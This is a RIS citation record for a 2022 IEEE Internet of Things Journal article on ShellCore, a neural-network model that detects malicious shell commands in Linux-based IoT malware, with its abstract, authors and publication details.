TY - JOUR
T1 - ShellCore
T2 - Automating Malicious IoT Software Detection Using Shell Commands Representation
AU - Alasmary, Hisham
AU - Anwar, Afsah
AU - Abusnaina, Ahmed
AU - Alabduljabbar, Abdulrahman
AU - Abuhamad, Mohammed
AU - Wang, An
AU - Nyang, Daehun
AU - Awad, Amro
AU - Mohaisen, David
N1 - Publisher Copyright:
© 2014 IEEE.
PY - 2022/2/15
Y1 - 2022/2/15
N2 - The Linux shell is a command-line interpreter that provides users with a command interface to the operating system, allowing them to perform various functions. Although very useful in building capabilities at the edge, the Linux shell can be exploited, giving adversaries a prime opportunity to use them for malicious activities. With access to Internet of Things (IoT) devices, malware authors can abuse the Linux shell of those devices to propagate infections and launch large-scale attacks, e.g., Distributed Denial of Service. In this work, we provide a first look at the tasks managed by shell commands in Linux-based IoT malware toward detection. We analyze malicious shell commands found in IoT malware and build a neural network-based model, ShellCore, to detect malicious shell commands. Namely, we collected a large data set of shell commands, including malicious commands extracted from 2891 IoT malware samples and benign commands collected from real-world network traffic analysis and volunteered data from Linux users. Using conventional machine and deep learning-based approaches trained with a term- and character-level features, ShellCore is shown to achieve an accuracy of more than 99% in detecting malicious shell commands and files (i.e., binaries).
AB - The Linux shell is a command-line interpreter that provides users with a command interface to the operating system, allowing them to perform various functions. Although very useful in building capabilities at the edge, the Linux shell can be exploited, giving adversaries a prime opportunity to use them for malicious activities. With access to Internet of Things (IoT) devices, malware authors can abuse the Linux shell of those devices to propagate infections and launch large-scale attacks, e.g., Distributed Denial of Service. In this work, we provide a first look at the tasks managed by shell commands in Linux-based IoT malware toward detection. We analyze malicious shell commands found in IoT malware and build a neural network-based model, ShellCore, to detect malicious shell commands. Namely, we collected a large data set of shell commands, including malicious commands extracted from 2891 IoT malware samples and benign commands collected from real-world network traffic analysis and volunteered data from Linux users. Using conventional machine and deep learning-based approaches trained with a term- and character-level features, ShellCore is shown to achieve an accuracy of more than 99% in detecting malicious shell commands and files (i.e., binaries).
KW - Internet of Things (IoT) security
KW - Linux shell commands
KW - machine learning
KW - malware detection
UR - http://www.scopus.com/inward/record.url?scp=85107354305&partnerID=8YFLogxK
U2 - 10.1109/JIOT.2021.3086398
DO - 10.1109/JIOT.2021.3086398
M3 - Article
AN - SCOPUS:85107354305
SN - 2327-4662
VL - 9
SP - 2485
EP - 2496
JO - IEEE Internet of Things Journal
JF - IEEE Internet of Things Journal
IS - 4
ER -